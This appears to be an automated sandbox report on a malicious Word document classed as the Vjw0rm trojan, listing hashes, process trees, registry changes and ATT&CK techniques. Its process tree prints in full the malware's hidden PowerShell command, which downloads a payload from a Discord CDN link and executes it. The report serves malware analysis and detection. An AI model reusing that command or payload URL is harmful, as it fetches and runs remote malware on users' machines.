vjw0rm | 44ceb0661cb7a7920cb2f75d8b30608e921d1a6a6d73045a40e3271856aa811a

Analysis

max time kernel
149s
max time network
175s
platform
windows7_x64
resource
win7v20210410
submitted
17-08-2021 21:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

44ceb0661cb7a7920cb2f75d8b30608e921d1a6a6d73045a40e3271856aa811a.doc
Size

15KB
MD5

7667baf4600d631f7aab1299604c9e8d
SHA1

ba5e3292901e3703621e81d23a9c8486ad42b835
SHA256

44ceb0661cb7a7920cb2f75d8b30608e921d1a6a6d73045a40e3271856aa811a
SHA512

fb85252cd011972a1ea4658cc5b9f9a80d6bdc2bd7219b4d04cbfb5eff5ee4e935addd1b5e104a9679ea4badfbde342b4df776de61343018e963b0308407c3a5

Score

10^/10

vjw0rm trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://cdn.discordapp.com/attachments/869602547248283711/877244888020840448/Main.png

Signatures

Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm

Blocklisted process makes network request 17 IoCs

Processes:

WScript.exepowershell.exe

flow	pid	process
12	900	WScript.exe
13	1904	powershell.exe
14	900	WScript.exe
15	900	WScript.exe
20	900	WScript.exe
21	900	WScript.exe
23	900	WScript.exe
25	900	WScript.exe
26	900	WScript.exe
29	900	WScript.exe
32	900	WScript.exe
33	900	WScript.exe
34	900	WScript.exe
36	900	WScript.exe
37	900	WScript.exe
38	900	WScript.exe
40	900	WScript.exe

Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Requerimiento.exe2.exe

pid process

1628 Requerimiento.exe
1412 2.exe

pid	process
1628	Requerimiento.exe
1412	2.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4.js	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4.js	WScript.exe

Loads dropped DLL 5 IoCs

Processes:

WINWORD.EXERequerimiento.exe

pid process

2028 WINWORD.EXE
1628 Requerimiento.exe
1628 Requerimiento.exe
1628 Requerimiento.exe
1628 Requerimiento.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 3 IoCs

Processes:

2.exevbc.exevbc.exe

description	pid	process	target process
PID 1412 set thread context of 2316	1412	2.exe	vbc.exe
PID 2316 set thread context of 2500	2316	vbc.exe	vbc.exe
PID 2500 set thread context of 2648	2500	vbc.exe	vbc.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2028 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1904 powershell.exe
1904 powershell.exe

pid	process
1904	powershell.exe
1904	powershell.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

powershell.exe2.exevbc.exevbc.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	1904	powershell.exe
Token: SeDebugPrivilege	1412	2.exe
Token: SeDebugPrivilege	2316	vbc.exe
Token: SeDebugPrivilege	2500	vbc.exe
Token: SeDebugPrivilege	2648	vbc.exe
Token: 33	2648	vbc.exe
Token: SeIncBasePriorityPrivilege	2648	vbc.exe
Token: 33	2648	vbc.exe
Token: SeIncBasePriorityPrivilege	2648	vbc.exe
Token: 33	2648	vbc.exe
Token: SeIncBasePriorityPrivilege	2648	vbc.exe
Token: 33	2648	vbc.exe
Token: SeIncBasePriorityPrivilege	2648	vbc.exe
Token: 33	2648	vbc.exe
Token: SeIncBasePriorityPrivilege	2648	vbc.exe
Token: 33	2648	vbc.exe
Token: SeIncBasePriorityPrivilege	2648	vbc.exe
Token: 33	2648	vbc.exe
Token: SeIncBasePriorityPrivilege	2648	vbc.exe
Token: 33	2648	vbc.exe
Token: SeIncBasePriorityPrivilege	2648	vbc.exe

Suspicious use of SetWindowsHookEx 16 IoCs

Processes:

WINWORD.EXE

pid	process
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WINWORD.EXERequerimiento.exeWScript.execmd.exe2.exevbc.exe

description	pid	process	target process
PID 2028 wrote to memory of 1628	2028	WINWORD.EXE	Requerimiento.exe
PID 2028 wrote to memory of 1628	2028	WINWORD.EXE	Requerimiento.exe
PID 2028 wrote to memory of 1628	2028	WINWORD.EXE	Requerimiento.exe
PID 2028 wrote to memory of 1628	2028	WINWORD.EXE	Requerimiento.exe
PID 2028 wrote to memory of 1628	2028	WINWORD.EXE	Requerimiento.exe
PID 2028 wrote to memory of 1628	2028	WINWORD.EXE	Requerimiento.exe
PID 2028 wrote to memory of 1628	2028	WINWORD.EXE	Requerimiento.exe
PID 2028 wrote to memory of 744	2028	WINWORD.EXE	splwow64.exe
PID 2028 wrote to memory of 744	2028	WINWORD.EXE	splwow64.exe
PID 2028 wrote to memory of 744	2028	WINWORD.EXE	splwow64.exe
PID 2028 wrote to memory of 744	2028	WINWORD.EXE	splwow64.exe
PID 1628 wrote to memory of 1412	1628	Requerimiento.exe	2.exe
PID 1628 wrote to memory of 1412	1628	Requerimiento.exe	2.exe
PID 1628 wrote to memory of 1412	1628	Requerimiento.exe	2.exe
PID 1628 wrote to memory of 1412	1628	Requerimiento.exe	2.exe
PID 1628 wrote to memory of 1412	1628	Requerimiento.exe	2.exe
PID 1628 wrote to memory of 1412	1628	Requerimiento.exe	2.exe
PID 1628 wrote to memory of 1412	1628	Requerimiento.exe	2.exe
PID 1628 wrote to memory of 1920	1628	Requerimiento.exe	WScript.exe
PID 1628 wrote to memory of 1920	1628	Requerimiento.exe	WScript.exe
PID 1628 wrote to memory of 1920	1628	Requerimiento.exe	WScript.exe
PID 1628 wrote to memory of 1920	1628	Requerimiento.exe	WScript.exe
PID 1628 wrote to memory of 1920	1628	Requerimiento.exe	WScript.exe
PID 1628 wrote to memory of 1920	1628	Requerimiento.exe	WScript.exe
PID 1628 wrote to memory of 1920	1628	Requerimiento.exe	WScript.exe
PID 1920 wrote to memory of 1204	1920	WScript.exe	cmd.exe
PID 1920 wrote to memory of 1204	1920	WScript.exe	cmd.exe
PID 1920 wrote to memory of 1204	1920	WScript.exe	cmd.exe
PID 1920 wrote to memory of 1204	1920	WScript.exe	cmd.exe
PID 1920 wrote to memory of 1204	1920	WScript.exe	cmd.exe
PID 1920 wrote to memory of 1204	1920	WScript.exe	cmd.exe
PID 1920 wrote to memory of 1204	1920	WScript.exe	cmd.exe
PID 1204 wrote to memory of 1904	1204	cmd.exe	powershell.exe
PID 1204 wrote to memory of 1904	1204	cmd.exe	powershell.exe
PID 1204 wrote to memory of 1904	1204	cmd.exe	powershell.exe
PID 1204 wrote to memory of 1904	1204	cmd.exe	powershell.exe
PID 1204 wrote to memory of 1904	1204	cmd.exe	powershell.exe
PID 1204 wrote to memory of 1904	1204	cmd.exe	powershell.exe
PID 1204 wrote to memory of 1904	1204	cmd.exe	powershell.exe
PID 1628 wrote to memory of 900	1628	Requerimiento.exe	WScript.exe
PID 1628 wrote to memory of 900	1628	Requerimiento.exe	WScript.exe
PID 1628 wrote to memory of 900	1628	Requerimiento.exe	WScript.exe
PID 1628 wrote to memory of 900	1628	Requerimiento.exe	WScript.exe
PID 1628 wrote to memory of 900	1628	Requerimiento.exe	WScript.exe
PID 1628 wrote to memory of 900	1628	Requerimiento.exe	WScript.exe
PID 1628 wrote to memory of 900	1628	Requerimiento.exe	WScript.exe
PID 1412 wrote to memory of 2316	1412	2.exe	vbc.exe
PID 1412 wrote to memory of 2316	1412	2.exe	vbc.exe
PID 1412 wrote to memory of 2316	1412	2.exe	vbc.exe
PID 1412 wrote to memory of 2316	1412	2.exe	vbc.exe
PID 1412 wrote to memory of 2316	1412	2.exe	vbc.exe
PID 1412 wrote to memory of 2316	1412	2.exe	vbc.exe
PID 1412 wrote to memory of 2316	1412	2.exe	vbc.exe
PID 1412 wrote to memory of 2316	1412	2.exe	vbc.exe
PID 1412 wrote to memory of 2316	1412	2.exe	vbc.exe
PID 1412 wrote to memory of 2316	1412	2.exe	vbc.exe
PID 1412 wrote to memory of 2316	1412	2.exe	vbc.exe
PID 1412 wrote to memory of 2316	1412	2.exe	vbc.exe
PID 2316 wrote to memory of 2500	2316	vbc.exe	vbc.exe
PID 2316 wrote to memory of 2500	2316	vbc.exe	vbc.exe
PID 2316 wrote to memory of 2500	2316	vbc.exe	vbc.exe
PID 2316 wrote to memory of 2500	2316	vbc.exe	vbc.exe
PID 2316 wrote to memory of 2500	2316	vbc.exe	vbc.exe
PID 2316 wrote to memory of 2500	2316	vbc.exe	vbc.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\44ceb0661cb7a7920cb2f75d8b30608e921d1a6a6d73045a40e3271856aa811a.doc"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2028

C:\Users\Admin\AppData\Local\Temp\Requerimiento.exe
Requerimiento.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1628

C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1412

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2500

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2648

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:1920

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://cdn.discordapp.com/attachments/869602547248283711/877244888020840448/Main.png');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
4⤵
- Suspicious use of WriteProcessMemory
PID:1204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://cdn.discordapp.com/attachments/869602547248283711/877244888020840448/Main.png');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4.js"
3⤵
- Blocklisted process makes network request
- Drops startup file
PID:900

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:744

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Persistence

Privilege Escalation

Defense Evasion

Scripting

T1064

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2.exe
MD5
12be709e545bd7cc299ac774db10df56

SHA1
da60713fa2252e9ae121fbddb4b6233c63631652

SHA256
4d4c674dff6b475809611b56a32988a72419d7e3342d2ccd6370ab4a887a2c9b

SHA512
a55fee706e0634024e5adbd99e369e1ad6e2299faa69d3fa50056384ae70bfa107c051dfe14e64dd4281b7ae0df565d0ec2239398fad93ea0b6753f482b7eb43

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.exe
MD5
12be709e545bd7cc299ac774db10df56

SHA1
da60713fa2252e9ae121fbddb4b6233c63631652

SHA256
4d4c674dff6b475809611b56a32988a72419d7e3342d2ccd6370ab4a887a2c9b

SHA512
a55fee706e0634024e5adbd99e369e1ad6e2299faa69d3fa50056384ae70bfa107c051dfe14e64dd4281b7ae0df565d0ec2239398fad93ea0b6753f482b7eb43

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.vbs
MD5
35054bdb043705bb9c1c8a594f69d6fb

SHA1
bce72d39604c130f8dcef8b3acf13fe8291ca476

SHA256
430328793e41c6843633bb0877aa02d7343a6f1d8fb903d4cac514031308979b

SHA512
213b0a51071fdb7e2771465095f5f7ea89eb690e37e05e4aa877314e3b3766beb26e8ef78b4ef4cd3a78f4cd6002697ff4b84740b81214cbea1c4361ef9615e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\4.js
MD5
3ed2dd265f168e2b71606ee0dfc67b43

SHA1
1ea61c18fdf136a36e600194abecf11e173c745d

SHA256
139b6fa0515cc409d3004b231b29711174c7661cc21805544ffe84c596c0feb7

SHA512
79eac0543a25539489b2c1cc20636e1f8660b4d405ebb0cab743b42de982360b191b83b40fe5a24ff4a4d3cc21872be6f45f00d4d3a88265dc199b54080a0eb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Requerimiento.exe
MD5
4c8b8d244f471478ad5c6bb4babb279e

SHA1
d7a22176243764fa8e499405597d612eb36cfbbd

SHA256
a3bda5240c364f1afd8a70384330092c99eb8d1c0133cf0c2e4e0dfaf927d6d8

SHA512
608e69ea5e59b4a00359ec3dc5b65da689ff1908e6ee0ad5a8824fd774fcfb39abaedfe3c84142734a3d12019844196e0e5b4fe1f00e76c251662f4677b148ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\Requerimiento.exe
MD5
4c8b8d244f471478ad5c6bb4babb279e

SHA1
d7a22176243764fa8e499405597d612eb36cfbbd

SHA256
a3bda5240c364f1afd8a70384330092c99eb8d1c0133cf0c2e4e0dfaf927d6d8

SHA512
608e69ea5e59b4a00359ec3dc5b65da689ff1908e6ee0ad5a8824fd774fcfb39abaedfe3c84142734a3d12019844196e0e5b4fe1f00e76c251662f4677b148ff

Download Submit
\Users\Admin\AppData\Local\Temp\2.exe
MD5
12be709e545bd7cc299ac774db10df56

SHA1
da60713fa2252e9ae121fbddb4b6233c63631652

SHA256
4d4c674dff6b475809611b56a32988a72419d7e3342d2ccd6370ab4a887a2c9b

SHA512
a55fee706e0634024e5adbd99e369e1ad6e2299faa69d3fa50056384ae70bfa107c051dfe14e64dd4281b7ae0df565d0ec2239398fad93ea0b6753f482b7eb43

Download Submit
\Users\Admin\AppData\Local\Temp\2.exe
MD5
12be709e545bd7cc299ac774db10df56

SHA1
da60713fa2252e9ae121fbddb4b6233c63631652

SHA256
4d4c674dff6b475809611b56a32988a72419d7e3342d2ccd6370ab4a887a2c9b

SHA512
a55fee706e0634024e5adbd99e369e1ad6e2299faa69d3fa50056384ae70bfa107c051dfe14e64dd4281b7ae0df565d0ec2239398fad93ea0b6753f482b7eb43

Download Submit
\Users\Admin\AppData\Local\Temp\2.exe
MD5
12be709e545bd7cc299ac774db10df56

SHA1
da60713fa2252e9ae121fbddb4b6233c63631652

SHA256
4d4c674dff6b475809611b56a32988a72419d7e3342d2ccd6370ab4a887a2c9b

SHA512
a55fee706e0634024e5adbd99e369e1ad6e2299faa69d3fa50056384ae70bfa107c051dfe14e64dd4281b7ae0df565d0ec2239398fad93ea0b6753f482b7eb43

Download Submit
\Users\Admin\AppData\Local\Temp\2.exe
MD5
12be709e545bd7cc299ac774db10df56

SHA1
da60713fa2252e9ae121fbddb4b6233c63631652

SHA256
4d4c674dff6b475809611b56a32988a72419d7e3342d2ccd6370ab4a887a2c9b

SHA512
a55fee706e0634024e5adbd99e369e1ad6e2299faa69d3fa50056384ae70bfa107c051dfe14e64dd4281b7ae0df565d0ec2239398fad93ea0b6753f482b7eb43

Download Submit
\Users\Admin\AppData\Local\Temp\Requerimiento.exe
MD5
4c8b8d244f471478ad5c6bb4babb279e

SHA1
d7a22176243764fa8e499405597d612eb36cfbbd

SHA256
a3bda5240c364f1afd8a70384330092c99eb8d1c0133cf0c2e4e0dfaf927d6d8

SHA512
608e69ea5e59b4a00359ec3dc5b65da689ff1908e6ee0ad5a8824fd774fcfb39abaedfe3c84142734a3d12019844196e0e5b4fe1f00e76c251662f4677b148ff

Download Submit
memory/744-69-0x0000000000000000-mapping.dmp

Download
memory/744-70-0x000007FEFC411000-0x000007FEFC413000-memory.dmp

Filesize
8KB

Download
memory/900-94-0x0000000000000000-mapping.dmp

Download
memory/1204-84-0x0000000000000000-mapping.dmp

Download
memory/1412-93-0x00000000003D0000-0x00000000003D1000-memory.dmp

Filesize
4KB

Download
memory/1412-76-0x0000000000000000-mapping.dmp

Download
memory/1412-121-0x0000000000480000-0x0000000000481000-memory.dmp

Filesize
4KB

Download
memory/1412-120-0x00000000046E0000-0x000000000473F000-memory.dmp

Filesize
380KB

Download
memory/1412-83-0x0000000000080000-0x0000000000081000-memory.dmp

Filesize
4KB

Download
memory/1628-65-0x0000000000000000-mapping.dmp

Download
memory/1628-71-0x00000000004E0000-0x00000000004E1000-memory.dmp

Filesize
4KB

Download
memory/1904-115-0x00000000066F0000-0x00000000066F1000-memory.dmp

Filesize
4KB

Download
memory/1904-118-0x00000000057F0000-0x00000000057F2000-memory.dmp

Filesize
8KB

Download
memory/1904-90-0x00000000048F0000-0x00000000048F1000-memory.dmp

Filesize
4KB

Download
memory/1904-92-0x00000000048B2000-0x00000000048B3000-memory.dmp

Filesize
4KB

Download
memory/1904-87-0x0000000000000000-mapping.dmp

Download
memory/1904-91-0x00000000048B0000-0x00000000048B1000-memory.dmp

Filesize
4KB

Download
memory/1904-119-0x0000000005960000-0x0000000005972000-memory.dmp

Filesize
72KB

Download
memory/1904-89-0x0000000000840000-0x0000000000841000-memory.dmp

Filesize
4KB

Download
memory/1904-97-0x0000000002570000-0x0000000002571000-memory.dmp

Filesize
4KB

Download
memory/1904-98-0x0000000004750000-0x0000000004751000-memory.dmp

Filesize
4KB

Download
memory/1904-101-0x00000000057B0000-0x00000000057B1000-memory.dmp

Filesize
4KB

Download
memory/1904-106-0x0000000005820000-0x0000000005821000-memory.dmp

Filesize
4KB

Download
memory/1904-107-0x0000000006460000-0x0000000006461000-memory.dmp

Filesize
4KB

Download
memory/1904-114-0x0000000005910000-0x0000000005911000-memory.dmp

Filesize
4KB

Download
memory/1904-117-0x00000000057A0000-0x00000000057A2000-memory.dmp

Filesize
8KB

Download
memory/1904-116-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1920-79-0x0000000000000000-mapping.dmp

Download
memory/2028-62-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2028-61-0x0000000070A41000-0x0000000070A43000-memory.dmp

Filesize
8KB

Download
memory/2028-60-0x0000000072FC1000-0x0000000072FC4000-memory.dmp

Filesize
12KB

Download
memory/2028-63-0x00000000765F1000-0x00000000765F3000-memory.dmp

Filesize
8KB

Download
memory/2316-122-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2316-123-0x0000000000402AAE-mapping.dmp

Download
memory/2316-125-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2316-127-0x0000000000940000-0x0000000000941000-memory.dmp

Filesize
4KB

Download
memory/2316-129-0x0000000000350000-0x0000000000351000-memory.dmp

Filesize
4KB

Download
memory/2500-131-0x0000000000402ABE-mapping.dmp

Download
memory/2500-130-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2500-133-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2500-135-0x0000000004810000-0x0000000004811000-memory.dmp

Filesize
4KB

Download
memory/2500-142-0x0000000000410000-0x0000000000411000-memory.dmp

Filesize
4KB

Download
memory/2648-138-0x000000000040676E-mapping.dmp

Download
memory/2648-137-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/2648-140-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/2648-143-0x0000000000F90000-0x0000000000F91000-memory.dmp

Filesize
4KB

Download
memory/2648-144-0x0000000000480000-0x0000000000485000-memory.dmp

Filesize
20KB

Download